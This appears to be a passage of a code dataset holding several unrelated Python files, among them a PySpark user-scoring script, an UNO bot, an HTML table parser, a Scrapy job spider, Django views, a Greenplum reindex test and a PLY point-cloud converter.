'trinityfb-donotdelete-pr-p7zcpkgojehbsq'))\r\n\r\ndf.show()\r\n\r\n\r\ncasted_df =df.withColumn(\"Tenure\",F.col('Tenure').cast(IntegerType()))\\\r\n .withColumn(\"Age\",F.col('Age').cast(IntegerType()))\\\r\n .withColumn(\"Friends\",F.col('Friends').cast(IntegerType()))\\\r\n .withColumn(\"Views\",F.col('Views').cast(IntegerType()))\\\r\n .withColumn(\"Likes\",F.col('Likes').cast(IntegerType()))\r\ncasted_df.printSchema()\r\n\r\n\r\n\r\n#input_df.show()\r\n\r\n#Age Score UDF\r\ndef age_score(age):\r\n if 0<=age<=21:\r\n return 7\r\n if 22<=age<=24:\r\n return 8\r\n if 25<=age<=26:\r\n return 10\r\n if 27<=age<=29:\r\n return 9\r\n if 30<=age<=32:\r\n return 6\r\n if 33<=age<=34:\r\n return 5\r\n if 35<=age<=37:\r\n return 4\r\n if 38<=age<=45:\r\n return 3\r\n if 46<=age<=49:\r\n return 2\r\n if age>=50:\r\n return 1\r\n#network_connection_Score \r\ndef friends_score(x):\r\n if 0<=x<=20:\r\n return 1\r\n if 21<=x<=100:\r\n return 2\r\n if 101<=x<=140:\r\n return 3\r\n if 141<=x<=200:\r\n return 4\r\n if 201<=x<=400:\r\n return 5\r\n if 401<=x<=500:\r\n return 6\r\n if 501<=x<=1000:\r\n return 7\r\n if 1001<=x<=2000:\r\n return 8\r\n if 2001<=x<=5000:\r\n return 9\r\n if x>=5000:\r\n return 10\r\n#Likes_Score\r\ndef like_view_score(x):\r\n if 0<=x<=1000:\r\n return 1\r\n if 1001<=x<=5000:\r\n return 2\r\n if 5001<=x<=10000:\r\n return 3\r\n if 10001<=x<=30000:\r\n return 4\r\n if 30001<=x<=50000:\r\n return 5\r\n if 50001<=x<=80000:\r\n return 6\r\n if 80001<=x<=100000:\r\n return 7\r\n if 100001<=x<=150000:\r\n return 8\r\n if 150001<=x<=200000:\r\n return 9\r\n if x>=200000:\r\n return 10\r\n\r\n#Age Score UDF\r\ndef tenure_score(age):\r\n if 0<=age<=21:\r\n return 1\r\n if 22<=age<=24:\r\n return 2\r\n if 25<=age<=26:\r\n return 3\r\n if 27<=age<=29:\r\n return 4\r\n if 30<=age<=32:\r\n return 5\r\n if 33<=age<=34:\r\n return 6\r\n if 35<=age<=37:\r\n return 7\r\n if 38<=age<=45:\r\n return 8\r\n if 46<=age<=49:\r\n return 9\r\n if age>=50:\r\n return 
10\r\n\r\n\r\n\r\n\r\n\r\n\r\nspark.udf.register(\"age_py\",age_score)\r\nspark.udf.register(\"friends_py\",friends_score)\r\nspark.udf.register(\"like_view_py\",like_view_score)\r\nspark.udf.register(\"tenure_py\",tenure_score)\r\n\r\n\r\n\r\nscore_df=casted_df.select(F.col('UserId'),F.col('Name'),F.col('Gender'),F.col('Age'),F.col('City'),F.col('Friends'),F.col('Likes'),F.col('Views'),F.col('Tenure'),F.expr(\"age_py(Age)\").alias('age_score')\\\r\n ,F.expr(\"tenure_py(Tenure)\").alias('tenure_score')\\\r\n ,F.expr(\"like_view_py(Likes)\").alias('like_score')\\\r\n ,F.expr(\"like_view_py(Views)\").alias('view_score')\\\r\n ,F.expr(\"friends_py(Friends)\").alias('friends_score')) \r\nfinal_df=score_df.select(F.col('*'))\\\r\n .withColumn(\"FB_score\",((F.col(\"age_score\") + F.col(\"tenure_score\") + F.col(\"like_score\") + F.col(\"view_score\") +F.col(\"friends_score\"))/5*100).alias('overall_score'))\r\n\r\nfinal_df.write\\\r\n .format('org.apache.spark.sql.execution.datasources.csv.CSVFileFormat')\\\r\n .option('header', 'true')\\\r\n .save(cos.url('fb_scored_pythontest.csv', 'trinityfb-donotdelete-pr-p7zcpkgojehbsq'))\r\n","sub_path":"Linked_in_Anlaysis.py","file_name":"Linked_in_Anlaysis.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"3112432","text":"from dataclasses import dataclass\nfrom scipy.stats import norm\nimport sys\n\ndef main():\n # print command line arguments\n for arg in sys.argv[1:]:\n print(arg)\n x=32\n mus=[10,15,28,30,32,40,45]\n cgs=[1,2,3,4,5]\n for mu in mus:\n print(\"{},{:.8f}\".format(mu,norm(mu,cgs[0]).pdf(x)))\n print(\"\\n\\n\")\n for cg in cgs:\n print(\"{},{:.8f}\".format(cg,norm(mus[4],cg).pdf(x)))\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"temp/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"77758737","text":"from player import Player\nimport functions\nfrom random import randint\nfrom collections import Counter\n\nclass BotPlayer(Player):\n def __init__(self, name):\n Player.__init__(self, name)\n\n def play(self, game):\n wild_color = (\"\\033[31m\" + \"W\" + \"\\033[0m\" + \n \"\\033[32m\" + \"i\" + \"\\033[0m\" + \n \"\\033[33m\" + \"l\" + \"\\033[0m\" + \n \"\\033[34m\" + \"d\" + \"\\033[0m\")\n\n for card in self.hand:\n check = functions.check_if_card_can_be_placed(card, game.pile[0], game.declared_color)\n\n if check:\n if len(self.hand) == 2:\n uno_call_chance = randint(0, 10)\n if uno_call_chance < 8:\n print(\"UNO!\")\n for player in game.players:\n if player == self:\n continue\n\n else:\n player.uno_calls.append(self.name) \n\n else:\n print(\"Oops! 
I forgot to call out UNO...\")\n self.draw_cards(2, game)\n\n game.pile.insert(0, self.hand.pop(self.hand.index(card)))\n\n if card.color == wild_color:\n hand_colors = [card.color for card in self.hand]\n max_color = Counter(hand_colors).most_common(1)[0][0]\n\n if max_color == wild_color:\n max_color = Counter(hand_colors).most_common(2)[1][0]\n\n game.declared_color = max_color\n\n print(\"I'm placing a {0} and I'm gonna choose the color {1}\".format(functions.format_card(card), max_color))\n return\n\n print(\"I'm placing a {0}\".format(functions.format_card(card)))\n return\n\n print(\"I can't place any cards, I'm gonna draw one...\")\n self.draw_cards(1, game)\n\n drawn_card = self.hand[-1]\n\n if functions.check_if_card_can_be_placed(drawn_card, game.pile[0], game.declared_color):\n print(\"Yes! Got a {0}\".format(functions.format_card(drawn_card)))\n game.pile.insert(0, self.hand.pop(-1))\n if drawn_card.color == wild_color:\n hand_colors = [card.color for card in self.hand]\n max_color = Counter(hand_colors).most_common(1)[0][0]\n game.declared_color = max_color\n\n print(\"I'm gonna choose the color {0}\".format(max_color))\n\n else:\n print(\"I can't place the card that I got...\")\n","sub_path":"bot_player.py","file_name":"bot_player.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"635422958","text":"#-*- coding: utf-8 -*-\n#\n# IEDPackageTableDataSource.py\n# AutoDMG\n#\n# Created by Per Olofsson on 2013-10-22.\n# Copyright (c) 2013 University of Gothenburg. All rights reserved.\n#\n\nfrom Foundation import *\nfrom AppKit import *\nimport os.path\n\n\nclass IEDPackageTableDataSource(NSObject):\n \n def init(self):\n self = super(IEDPackageTableDataSource, self).init()\n if self is None:\n return None\n \n self.packages = list()\n self.pkgImage = NSImage.imageNamed_(u\"Package\")\n \n return self\n \n def packagePaths(self):\n return [pkg[u\"path\"] for pkg in self.packages]\n \n def numberOfRowsInTableView_(self, tableView):\n return len(self.packages)\n \n def tableView_objectValueForTableColumn_row_(self, tableView, column, row):\n return self.packages[row][column.identifier()]\n \n def tableView_setObjectValue_forTableColumn_row_(self, tableView, obj, column, row):\n self.packages.insert(row, obj)\n \n def tableView_validateDrop_proposedRow_proposedDropOperation_(self, tableView, info, row, operation):\n if info.draggingSource() == tableView:\n return NSDragOperationMove\n pboard = info.draggingPasteboard()\n paths = pboard.propertyListForType_(NSFilenamesPboardType)\n if not paths:\n return NSDragOperationNone\n for path in paths:\n name, ext = os.path.splitext(path)\n if ext.lower() not in (u\".pkg\", u\".mpkg\"):\n return NSDragOperationNone\n return NSDragOperationCopy\n \n def tableView_acceptDrop_row_dropOperation_(self, tableView, info, row, operation):\n pboard = info.draggingPasteboard()\n # If the source is the tableView, we're reordering packages within the\n # table and the pboard contains the source row indices.\n if info.draggingSource() == tableView:\n indices = [int(i) for i in pboard.propertyListForType_(NSStringPboardType).split(u\",\")]\n for i in indices:\n self.packages[row], self.packages[i] = self.packages[i], self.packages[row]\n else:\n # Otherwise it's a list of paths to add to the table.\n paths = pboard.propertyListForType_(NSFilenamesPboardType)\n for i, path in enumerate(paths):\n package = {\n u\"image\": 
NSWorkspace.sharedWorkspace().iconForFile_(path),\n u\"path\": path,\n u\"name\": os.path.basename(path),\n }\n self.packages.insert(row + i, package)\n tableView.reloadData()\n return True\n \n def tableView_writeRowsWithIndexes_toPasteboard_(self, tableView, rowIndexes, pboard):\n # When reordering packages put a list of indices as a string onto the pboard.\n indices = list()\n index = rowIndexes.firstIndex()\n while index != NSNotFound:\n indices.append(index)\n index = rowIndexes.indexGreaterThanIndex_(index)\n pboard.declareTypes_owner_([NSStringPboardType], self)\n pboard.setPropertyList_forType_(u\",\".join(unicode(i) for i in indices), NSStringPboardType)\n return True\n\n\n","sub_path":"AutoDMG/IEDPackageTableDataSource.py","file_name":"IEDPackageTableDataSource.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"224231097","text":"class Employer:\r\n\tdef __init__(self,name,surname,money):\r\n\t\tself.name = name\r\n\t\tself.surname = surname\r\n\t\tself.money = money \r\n\t\tself.mail = self.surname+\".\"+self.name+\"@hotmail\"\r\n\r\n\tdef fullname(self):\r\n\t\treturn \"{} {}\".format(self.name,self.surname)\r\n\r\nemployee1 = Employer(\"Sansa\",\"Stark\",5000)\r\n\r\nprint(employee1.name)\r\nprint(employee1.fullname())","sub_path":"class_instance.py","file_name":"class_instance.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178387554","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"HTML Table parser\"\"\"\n\nimport re\nfrom itertools import product\nfrom functools import reduce\nfrom urllib.request import urlopen\nfrom urllib.parse import quote\nfrom bs4 import BeautifulSoup\n\n\nclass Table:\n \"\"\"\n Table Tag Parser\n This class analyzes row and col of Table and\n convert HTML Table to TSV(Tab-Separated Values).\n \"\"\"\n def __init__(self, soup):\n self.soup = soup\n self.table_map = {}\n self.table_size = (0, 0)\n self._parse_table(soup)\n\n def _parse_table(self, table):\n if table.thead:\n thead_trs = table.thead.find_all(\"tr\", recursive=False)\n self._add_cells(thead_trs, header_flag=True)\n tbody = table.tbody if table.tbody else table\n tbody_trs = tbody.find_all(\"tr\", recursive=False)\n self._add_cells(tbody_trs, header_flag=False)\n\n def _add_cells(self, trs, header_flag):\n re_td = re.compile(\"t[hd]\")\n x = 0\n for y, tr in enumerate(trs, start=self.table_size[0]):\n x = 0\n tds = tr.find_all(re_td, recursive=False)\n for td in tds:\n while (y, x) in self.table_map:\n x += 1\n cell = Cell(td, header_flag)\n for p in product(range(y, y + cell.dy),\n range(x, x + cell.dx)):\n self.table_map[p] = cell\n x += cell.dx\n self.table_size = (self.table_size[0] + len(trs), x)\n\n def get_strings(self, with_header=True):\n old_y = 0\n keys = sorted(self.table_map)\n words = []\n lines = []\n for y, x in keys:\n v = self.table_map[(y, x)]\n if not with_header and v.is_header():\n continue\n if y == old_y:\n words.append(str(v))\n else:\n lines.append(\"\\t\".join(words))\n if y - old_y > 1:\n lines.append(\"\\n\" * (y - old_y - 2))\n words = [str(v)]\n old_y = y\n if words:\n lines.append(\"\\t\".join(words))\n\n return \"\\n\".join(lines)\n\n def get_title(self, length=30):\n \"\"\"\n return table title whose length is limitied to 'length'.\n If length = 0, return full-long title.\n \"\"\"\n if length != 0:\n return_txt = self.get_title(length=0)\n if 
len(return_txt) <= length:\n return return_txt\n return return_txt[0:length-3] + \"...\"\n if self.soup.caption:\n return reduce(lambda x, y: x + y,\n list(self.soup.caption.stripped_strings), \"\")\n if (self.table_map[(0, 0)].is_header() and\n self.table_map[(0, 0)].dx == self.table_size[1]):\n return reduce(\n lambda x, y: x + y,\n list(self.table_map[(0, 0)].soup.stripped_strings),\n \"\"\n )\n target = self.soup.previous_sibling\n while target is not None and target.name != \"table\":\n if target.name is not None and re.match(r'h[1-6]$', target.name):\n return reduce(lambda x, y: x + y,\n list(target.stripped_strings), \"\")\n target = target.previous_sibling\n return \"\\t\".join([str(self.table_map[(0, x)])\n for x in range(0, self.table_size[1])])\n\n def __str__(self):\n return self.get_strings()\n\n\nclass Cell:\n \"\"\"\n Table Data Parser\n This class extracts \"TD\" tag contents.\n \"\"\"\n def __init__(self, soup, in_thead=False):\n self.soup = soup\n self.dx = int(soup.get(\"colspan\", 1))\n self.dy = int(soup.get(\"rowspan\", 1))\n self.in_thead = in_thead\n\n def __str__(self):\n if not hasattr(self, \"_string_cache\"):\n self._string_cache = reduce(lambda x, y: x + y,\n list(self.soup.stripped_strings), \"\")\n return self._string_cache\n\n def is_header(self):\n return self.in_thead or self.soup.name == 'th'\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser(description='HTML Table Parser')\n parser.add_argument('url', help='target URL')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-a', '--all', action='store_true',\n help='show all table', default=False)\n group.add_argument('-n', '--table-num', type=int, metavar='num',\n action='append', help='table number', default=[])\n parser.add_argument('--without-contents', action='store_false',\n dest=\"contents_flag\",\n help='dosen\\'t show table contents')\n parser.add_argument('--dump', action='store_true',\n help='dump html source.')\n parser.add_argument('--with-header', action='store_true',\n default=True, dest=\"header\", help='with header')\n parser.add_argument('--without-header', action='store_false',\n dest=\"header\", help='without header')\n args = parser.parse_args()\n if args.contents_flag and not args.all and not args.table_num:\n args.contents_flag = False\n args.all = True\n\n def urlencode_ch(m):\n t = m.groups()\n if t[0]:\n return t[0]\n return quote(t[1])\n args.url = re.sub(r\"\"\"([A-Za-z0-9._~!$&'()*+,;?=:@-]|\"\"\"\n r\"\"\"%[A-Fa-f0-9]{2})|(.)\"\"\",\n urlencode_ch, args.url)\n\n with urlopen(args.url) as f:\n text = f.read()\n text = text.replace(b\"\\n\", b\"\").replace(b\"\\r\", b\"\")\n soup = BeautifulSoup(text, \"lxml\")\n tables = soup.find_all(\"table\")\n for count, table in enumerate(tables, 1):\n if not args.all and count not in args.table_num:\n continue\n t = Table(table)\n if len(tables) != 1:\n print(\"Table %d: %s\" % (count, t.get_title()))\n if args.dump:\n print(table)\n elif args.contents_flag:\n print(t.get_strings(with_header=args.header))\n print()\n\n return 0\n\n\nif __name__ == '__main__':\n import sys\n sys.exit(main())\n","sub_path":"tableparser.py","file_name":"tableparser.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"596027595","text":"\"\"\"\nCopyright (c) 2004-Present Pivotal Software, Inc.\n\nThis program and the accompanying materials are made available under\nthe terms of the under the Apache License, Version 2.0 (the 
\"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport os\nimport socket\nimport tinctest\nimport unittest2 as unittest\nfrom tinctest.lib import local_path\nfrom mpp.gpdb.tests.storage.lib import Database\nfrom mpp.models import MPPTestCase\nfrom tinctest.models.scenario import ScenarioTestCase\nfrom mpp.gpdb.tests.storage.lib.sql_isolation_testcase import SQLIsolationTestCase\nfrom mpp.lib.PSQL import PSQL\nfrom mpp.gpdb.tests.storage.vacuum.reindex import Reindex\n\nclass ReindexTestCase(ScenarioTestCase, MPPTestCase):\n\n def test_reindex_scenarios(self):\n '''\n This test currently verifies following situations --\n 1. Table dropped during reindex database should not fail. Drop table transaction will either succeed or\n block. But in any case reindex database will proceed without failure.\n 2. Reindex table should be able to retain the system in consistent mode even if a new index is added\n concurrently.\n '''\n\n list_setup = []\n list_setup.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_stp\")\n self.test_case_scenario.append(list_setup, serial=True)\n\n list_drop_table_reindex_db = []\n list_drop_table_reindex_db.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_db\")\n list_drop_table_reindex_db.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.drop_obj\")\n self.test_case_scenario.append(list_drop_table_reindex_db, serial=False)\n\n list_add_index_reindex_table = []\n list_add_index_reindex_table.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_rel\")\n list_add_index_reindex_table.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.add_index\")\n self.test_case_scenario.append(list_add_index_reindex_table, serial=False)\n\n list_verify = []\n list_verify.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_verify\")\n self.test_case_scenario.append(list_verify, serial=True)\n\n def test_reindex_gpFastSequence(self):\n '''\n This is to test gp_fastsequence reindex while insert is happening in other relations\n STEPS:\n 1. Create aoco table with index (setup_gpfastseq)\n 2. In TXN 1 Inject fault to suspend reindex_relation and issue reindex gp_fastsequence (reindex_gpfastseq)\n 3. In TXN 2 Check that the fault injected in TXN 1 is set and then insert 100 rows in table created in step 1.\n (insert_tup_gpfastseq). This step will wait as it needs to update gp_fastsequence last_sequence for the aoco\n on the Master relation and TXN 1 has placed a lock on gp_fastsequence table.\n 4. In TXN 3 Reset the reindex_relation fault so that TXN 1 and TXN 2 can finish (reset_fault)\n 5. 
Verify and validate that relfilenodes (for gp_fastsequence and the aoco tables) are synced on all segments\n and gp_fastsequence last_sequence is calculated correctly after each insert for aoco relation on all\n segments (verify_gpfastseq)\n '''\n\n list_setup = []\n list_setup.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.setup_gpfastseq\")\n self.test_case_scenario.append(list_setup, serial=True)\n\n list_insert_tup_reindex_gpfastsequence = []\n list_insert_tup_reindex_gpfastsequence.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_gpfastseq\")\n list_insert_tup_reindex_gpfastsequence.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.insert_tup_gpfastseq\")\n list_insert_tup_reindex_gpfastsequence.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reset_fault\")\n self.test_case_scenario.append(list_insert_tup_reindex_gpfastsequence, serial=False)\n\n list_verify = []\n list_verify.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.verify_gpfastseq\")\n self.test_case_scenario.append(list_verify, serial=True)\n\nclass ReindexConcurrencyTestCase(SQLIsolationTestCase):\n '''\n Test for REINDEX (index/table/system/database) with various concurrent transactions.\n Includes bitmap/btree/GiST tys of indexes\n For storage type AO/AOCO/Heap Relations\n '''\n sql_dir = 'concurrency/sql/'\n ans_dir = 'concurrency/expected'\n out_dir = 'concurrency/output/'\n","sub_path":"src/test/tinc/tincrepo/mpp/gpdb/tests/storage/vacuum/reindex/test_reindex.py","file_name":"test_reindex.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453943081","text":"from conans import ConanFile, CMake\n\nclass Chess(ConanFile):\n requires = (\"glm/0.9.9.7@_/_\",\n \"glew/2.1.0@bincrafters/stable\",\n \"glfw/3.3.2@bincrafters/stable\",\n # Defining zlib explicitly resolves dependency conflict\n \"zlib/1.2.11@_/_\",\n )\n generators = \"cmake\"\n\n def build(self):\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"482374173","text":"\n#menuzinho das opções\nprint(\"0- sair\")\nprint(\"1-adicionar produto\")\nprint(\"2-remover produto\")\nprint(\"3-modificar produto\")\nprint(\"4-mostrar estoque completo\")\n\n\n#estoque da loja\nestoque={}\n\n#definindo escolha do menu\nescolha=1\n\n#enquanto não escolherem 0, o programa fica repetindo\nwhile escolha!=\"0\":\n escolha=input(\"faça sua escolha:\")\n \n#opção de menu 1\n if escolha==\"1\":\n produto=input(\"nome do produto:\")\n while produto in estoque:\n print (\"este produto já existe\")\n produto=input(\"nome do produto:\")\n quantidade_inicial=int(input(\"quantidade:\"))\n preco = float(input('valor unitário:'))\n while quantidade_inicial<0:\n print (\"a quantidade inicial não pode ser negativa\")\n quantidade_inicial=int(input(\"quantidade:\"))\n preco = float(input('valor unitário:'))\n caracteristica={\"quantidade\":quantidade_inicial,'valor unitario':preco}\n estoque[produto]=caracteristica\n print (\"{0} {1}s foram adicionadas, custando {2} reais cada\".format(quantidade_inicial, produto,preco))\n\n#opção de menu 2\n elif escolha == \"2\":\n remover= input(\"Digite o nome do produto que deseja remover: \")\n while remover not in estoque:\n print 
(\"Produto não encontrado\")\n remover = input (\"Digite um produto válido: \")\n if remover in estoque:\n del estoque [remover]\n print (\"{0} foi removido\".format(remover))\n \n#opção de menu 3\n elif escolha == \"3\":\n produto=input('digite o nome do produto: ')\n while produto not in estoque:\n print ('elemento não encontrado')\n produto= input (\"digite o nome do produto: \")\n valor_adicional = int(input('quantidade do produto: '))\n estoque[produto]['quantidade'] += valor_adicional\n print ('novo estoque de {0} é {1}'.format(produto,estoque[produto]['quantidade']))\n \n\n#opção de menu 4\n elif escolha == \"4\":\n print(\"Estoque:\")\n for chave, valor in estoque.items():\n print (\"{0} : {1} , {2}\".format(chave,valor[\"quantidade\"], valor ['valor unitario']))\n elif escolha != \"0\":\n print (\"Comando inválido\")\n\nprint (\"Até a próxima, amigo!\")\n","sub_path":"item3.py","file_name":"item3.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216038104","text":"from django.shortcuts import render\nfrom .models import Slider\nfrom adoption.models import Adoption\nfrom caretaker.models import Caretaker\nfrom ngo.models import Ngo\nfrom vets.models import Vets\n\n# Create your views here.\n\ndef home(request):\n sliders = Slider.objects.all()\n adoption = Adoption.objects.order_by('-created_date')\n caretaker = Caretaker.objects.order_by('-created_date')\n ngo = Ngo.objects.order_by('-created_date')\n vets = Vets.objects.order_by('-created_date')\n\n\n data = {\n 'sliders' : sliders,\n 'adoption' : adoption,\n 'caretaker' : caretaker,\n 'ngo' : ngo,\n 'vets' : vets\n }\n\n return render(request, 'webpages/home.html', data)\n\n\ndef about(request):\n return render(request, 'webpages/about.html')\n\n\ndef contact(request):\n return render(request, 'webpages/contact.html')","sub_path":"AniWorld/webpages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"22549936","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 16 14:29:29 2018\n\n@author: Mjr\n\"\"\"\n\n\nclass Twosum():\n\n def __init__(self):\n self.target_count = 0\n self.data = []\n\n def addData(self, pt):\n self.data.append(pt)\n\n def TwoSum(self, lower, upper):\n for sum_cr in range(lower, upper+1, 1):\n print('current iteration:', sum_cr)\n hash_table = {}\n for i in self.data:\n if (sum_cr - i in hash_table and sum_cr - i != i):\n self.target_count += 1\n print('current target count:', self.target_count)\n break\n hash_table[i] = i\n\n\nmike = Twosum()\n\ndat = open('prob-2sum.txt', 'r')\n\nfor line in dat.readlines():\n mike.addData(int(line))\n\nmike.TwoSum(-10000, 10000)\n\nprint('my answer is: ', mike.target_count)\n","sub_path":"python/anaconda/spyder/algorithms/archive/2Sum.py","file_name":"2Sum.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"392044177","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a OurCareerPages spider created on top of the ATSSpider\nscrapy crawl ourcareerpages -a url=\"http://agc-sd.ourcareerpages.com\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://agc-sd.ourcareerpages.com\n http://simoncontractors2.ourcareerpages.com\n http://mm-corporate-hourly.ourcareerpages.com\n 
http://asplundh.ourcareerpages.com\n\"\"\"\n\nfrom json import loads\nfrom re import compile\n\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveEmptyTags\n\n\nclass OurCareerPages(ATSSpider):\n\n name = \"ourcareerpages\"\n url_fragmentanchor = \"/WebServices/BDHWebServiceDirector.asmx/ProcessRequest\"\n start_url = \"\"\n subdomain_re = compile(\"//(.*?)\\.\")\n subdomain = \"\"\n\n def __init__(self, *args, **kwargs):\n if 'url' in kwargs:\n self.start_url = kwargs['url']\n sub_res = self.subdomain_re.search(kwargs['url'])\n if sub_res:\n self.subdomain = sub_res.group(1)\n\n super(OurCareerPages, self).__init__(*args, **kwargs)\n\n def start_requests(self):\n query = '{\"className\":\"HostedCareerPage\",\"methodName\":\"GetSearchResults\",\"methodParms\":{\"searchBy\":{\"AND\":{\"state_abbrev\":\"\",\"city\":\"\",\"skill_tags\":\"\"},\"LIKE\":{\"description\":\"\",\"job_title\":\"\"},\"IN\":{\"postal_code\":\"\"},\"COUNTY\":{\"postal_code\":\"\"}},\"ccpCode\":\"%s\"}}' % self.subdomain\n headers = {\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Accept\": \"application/json; charset=utf-8\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/json; charset=UTF-8\"\n }\n yield Request(\n self.start_urls[0],\n method='POST',\n body=query,\n headers=headers,\n callback=self.parse\n )\n\n def parse(self, response):\n try:\n json_res = loads(response.body)\n except Exception:\n # expected json response wad not found\n return\n\n jobs = json_res.get(\"d\", {}).get(\"retVals\", {}).get(\"job\", {})\n for job in jobs:\n url = \"%s/JobView.aspx?id=%s\" % (\n self.start_url, job.get('job_id', \"\")\n )\n meta = {\n 'title': job.get('job_title', \"\"),\n 'location': [job.get('city', \"\"), job.get('state_abbrev', \"\")],\n 'zip_code': job.get('postal_code', \"\"),\n \"jobid\": str(job.get('job_id', \"\"))\n }\n yield Request(url, meta=meta, callback=self.parse_job_callback())\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_value('location', response.meta['location'])\n loader.add_value('zip_code', response.meta['zip_code'])\n loader.add_value(\n 'referencenumber', response.meta['jobid'],\n Prefix(\"%s-%s-\" % (self.name, self.subdomain))\n )\n loader.add_xpath(\n \"description\",\n \"//div[input[@id='btnApply']]/following-sibling::div[1]\",\n RemoveEmptyTags()\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/ourcareerpages.py","file_name":"ourcareerpages.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"3449335","text":"import math\n\ndef IsPrime(n):\n if(n == 2):\n return True\n elif(n % 2 == 0 or n < 2):\n return False\n length = math.floor(math.sqrt(n) / 2) + 1\n ls = [True] * length\n ls[0] = False\n for i in range(length):\n if(ls[i] == False):\n continue\n else:\n if(n % (2 * i + 1) == 0):\n return False\n else:\n for l in [x for x in range(1, math.floor((2 * length - 1) / (2 * i + 1)) + 1) if x % 2 != 0]:\n ls[math.floor(i * l + (l - 1) / 2)] = False\n return True\n","sub_path":"dockerized-gists/8366855/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"590765460","text":"\n\nfrom xai.brain.wordbase.nouns._nativity import _NATIVITY\n\n#calss header\nclass _NATIVITIES(_NATIVITY, ):\n\tdef __init__(self,): \n\t\t_NATIVITY.__init__(self)\n\t\tself.name = \"NATIVITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"nativity\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_nativities.py","file_name":"_nativities.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279202761","text":"import os, argparse\nimport numpy as np\nfrom plyfile import PlyData\nfrom tqdm import tqdm\n\n#def parse_args():\n# parser = argparse.ArgumentParser()\n\n# parser.add_argument('--all', action='store_true', default=True, help='prepare all scenes')\n# # parser.add_argument('--input', type=str, default='/home/oscar/media/frustum/object/training/velodyne/001047.ply')\n# # parser.add_argument('--output', type=str, default='/home/oscar/media/frustum/object/training/001047.bin')\n\n# args = parser.parse_args()\n# return args\n\ndef read_ply(ply_path):\n plydata = PlyData.read(ply_path)\n vertex = plydata.elements[0].data\n points = np.asarray(vertex.tolist())\n return points\n\nif __name__ == '__main__':\n #args = parse_args()\n\n #if args.all:\n input_path = \"/mnt/gpid08/users/ian.riera/kitti/pointcloud_ply/\"\n output_path = \"/mnt/gpid08/users/ian.riera/kitti/prepared_ply/\"\n #output_path = '/mnt/gpid08/users/ian.riera/media/openpcdet/training/velodyne'\n\n\n for subdir, dirs, files in os.walk(input_path):\n for file in 